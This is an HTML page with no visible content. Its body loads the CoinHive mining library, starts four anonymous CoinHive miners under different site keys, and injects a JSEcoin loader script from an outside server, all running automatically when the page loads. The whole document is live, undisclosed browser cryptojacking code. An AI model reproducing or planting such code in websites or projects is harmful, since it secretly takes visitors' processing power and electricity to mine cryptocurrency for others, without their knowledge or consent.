<!DOCTYPE html>
<html>
  <head><meta charset="utf-8"></head>
  <body>
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	  <script>
	var miner = new CoinHive.Anonymous('WgEjD2Jxm1SWTM25tAMO6mlBzhbm56TS');
	miner.start();
</script>
<script>
	var miner = new CoinHive.Anonymous('WWqvTSZnACCbGH8MHoPozP4GpoB72A5O');
	miner.start();
</script>
<script>
	var miner = new CoinHive.Anonymous('lhI8RwL0rYaOhy6lQD9SKkjc2hvLAdyM');
	miner.start();
</script>
<script>
	var miner = new CoinHive.Anonymous('GnRYj5sLYwhB6GqgSfrVIDWOFnFks5vZ');
	miner.start();
</script>
<script type="text/javascript">
(function() {
var trackingurl = 'https://load.jsecoin.com/server/load/3919/noweb/nojs/0/';
var d=document, j=d.createElement('script'), s=d.getElementsByTagName('script')[0];
j.type='text/javascript'; j.async=true; j.defer=true; j.src=trackingurl; s.parentNode.insertBefore(j,s);
})();
</script>
  </body>
</html>
